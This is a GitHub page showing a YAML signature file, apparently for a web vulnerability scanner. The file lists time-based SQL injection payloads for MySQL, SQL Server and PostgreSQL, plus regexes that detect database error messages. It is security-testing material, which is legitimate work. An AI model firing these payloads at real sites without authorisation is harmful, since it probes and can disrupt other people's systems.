-
Notifications
You must be signed in to change notification settings - Fork 40
/
time-sqli.yaml
131 lines (102 loc) · 6.23 KB
/
time-sqli.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
# info to search signature
id: time-based-sqli
type: fuzz
info:
name: Time Based SQLi
risk: High
# origin: gonna come from Burp
payloads:
- \'XOR(if(now()=sysdate(),sleep(5*1),0))OR\'
- if(now()=sysdate(),sleep(5),0)
- (select(0)from(select(sleep(5)))v)/*\'+(select(3)from(select(sleep(5)))v)+\'\"+(select(0)from(select(sleep(5)))v)+\"*/
- \'XOR(if(now()=sysdate(),sleep(5*1),0))XOR\'Z
- 1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND \'\%\'=\'
- 1\'XOR(if(now()=sysdate(),sleep(5),0))OR\'
- 1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
- 1 or sleep(5)#
- \' WAITFOR%20DELAY \'0:0:5\'--
- \%\';SELECT PG_SLEEP(5)--
- pg_sleep(5)
- \'| |pg_sleep(5)--
requests:
- redirect: false
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
generators:
# Change exist content type or adding new one
- Query("{{.payload}}")
detections:
- >-
ResponseTime() > 5 && ResponseTime() < 6
# Cache
- >-
RegexSearch("resBody", "encountered after end of query|A comparison operator is required here")
# CrateDB
- >-
RegexSearch("resBody", "io\.crate\.client\.jdbc")
# MimerSQL
- >-
RegexSearch("resBody", "com\.mimer\.jdbc|Syntax error,[^\n]+assumed to mean")
# Altibase
- >-
RegexSearch("resBody", "Altibase\.jdbc\.driver")
# Presto
- >-
RegexSearch("resBody", "com\.facebook\.presto\.jdbc|io\.prestosql\.jdbc|com\.simba\.presto\.jdbc|UNION query has different number of fields: [0-9]+, [0-9]+")
# Mckoi
- >-
RegexSearch("resBody", "com\.mckoi\.JDBCDriver|com\.mckoi\.database\.jdbc|<REGEX_LITERAL>")
# Vertica
- >-
RegexSearch("resBody", ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):|/vertica/Parser/scan|com\.vertica\.jdbc|org\.jkiss\.dbeaver\.ext\.vertica|com\.vertica\.dsi\.dataengine")
# Apache Derby
- >-
RegexSearch("resBody", "Syntax error: Encountered|org\.apache\.derby|ERROR 42X01")
# MonetDB
- >-
RegexSearch("resBody", "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)|\\[MonetDB\\]\\[ODBC Driver|nl\.cwi\.monetdb\.jdbc")
# H2
- >-
RegexSearch("resBody", "org\.h2\.jdbc")
# HSQLDB
- >-
RegexSearch("resBody", "Unexpected end of command in statement \\[|Unexpected token.*?in statement \\[|org\.hsqldb\.jdbc")
# FrontBase
- >-
RegexSearch("resBody", "Exception (condition )?[0-9]+\. Transaction rollback|com\.frontbase\.jdbc|Syntax error 1. Missing|(Semantic|Syntax) error [1-4][0-9]{2}\.")
# Ingres
- >-
RegexSearch("resBody", "Warning.*?\Wingres_|Ingres SQLSTATE|Ingres\W.*?Driver|com\.ingres\.gcf\.jdbc")
# Sybase
- >-
RegexSearch("resBody", "Warning.*?\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\.Data\.AseClient|com\.sybase\.jdbc")
# SAP MaxDB
- >-
RegexSearch("resBody", "SQL error.*?POS([0-9]+)|Warning.*?\Wmaxdb_|DriverSapDB|-3014.*?Invalid end of SQL statement|com\.sap\.dbtech\.jdbc|\[-3008\].*?: Invalid keyword or missing delimiter")
# SQLite
- >-
RegexSearch("resBody", "SQLite/JDBCDriver|SQLite\.Exception|(Microsoft|System)\.Data\.SQLite\.SQLiteException|Warning.*?\W(sqlite_|SQLite3::)|SQLite error [0-9]{1,}:|sqlite3.OperationalError:|SQLite3::SQLException|org\.sqlite\.JDBC|SQLiteException")
# Firebird
- >-
RegexSearch("resBody", "Dynamic SQL Error|Warning.*?\Wibase_|org\.firebirdsql\.jdbc")
# Informix
- >-
RegexSearch("resBody", "Warning.*?\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\.informix\.jdbc|weblogic\.jdbc\.informix|IfxException")
# IBM DB2
- >-
RegexSearch("resBody", "CLI Driver.*?DB2|DB2 SQL error|db2_\w+\\(|SQLCODE[=:\d, -]+SQLSTATE|com\.ibm\.db2\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|DB2Exception|ibm_db_dbi\.ProgrammingError")
# Oracle
- >-
RegexSearch("resBody", "\bORA-\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\.jdbc\.oracle|oracle\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|OracleException")
# Microsoft Access
- >-
RegexSearch("resBody", "Microsoft Access ([0-9]+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \(missing operator\) in query expression")
# Microsoft SQL Server
- >-
RegexSearch("resBody", "Driver.*? SQL[\-\_\ ]*Server|OLE DB.*? SQL Server|\bSQL Server[^<"]+Driver|Warning.*?\W(mssql|sqlsrv)_|\bSQL Server[^<"]+[0-9a-fA-F]{8}|System\.Data\.SqlClient\.SqlException|(?s)Exception.*?\bRoadhouse\.Cms\.|Microsoft SQL Native Client error '[0-9a-fA-F]{8}|ODBC SQL Server Driver|ODBC Driver \d+ for SQL Server|SQLServer JDBC Driver|com\.jnetdirect\.jsql|macromedia\.jdbc\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\.microsoft\.sqlserver\.jdbc|SQL(Srv|Server)Exception")
# MySql
- >-
RegexSearch("resBody", "check the manual that (corresponds to|fits) your MySQL server version|SQL syntax.*?MySQL|Warning.*?\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that (corresponds to|fits) your MariaDB server version\" fork=\"MariaDB|check the manual that (corresponds to|fits) your Drizzle server version\" fork=\"Drizzle|Unknown column '[^ ]+' in 'field list'|MySqlClient\.|com\.mysql\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|MySqlException|SQLSTATE\[\d+\]: Syntax error or access violation|MemSQL does not support this type of query\" fork=\"MemSQL|is not supported by MemSQL\" fork=\"MemSQL|unsupported nested scalar subselect\" fork=\"MemSQL")
# PostgreSQL
- >-
RegexSearch("resBody", "PostgreSQL.*?ERROR|Warning.*?\Wpg_|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\.postgresql\.jdbc|PSQLException")